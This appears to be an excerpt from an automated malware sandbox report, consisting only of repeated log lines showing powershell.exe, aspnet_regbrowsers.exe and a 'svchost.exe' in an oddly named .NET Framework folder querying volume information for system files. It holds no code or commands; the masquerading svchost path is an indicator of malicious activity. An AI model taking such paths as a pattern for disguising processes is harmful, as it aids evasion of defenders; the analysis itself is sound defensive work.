                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exe VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\BABEDAFADDBCFEAAEFCDFCDE\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
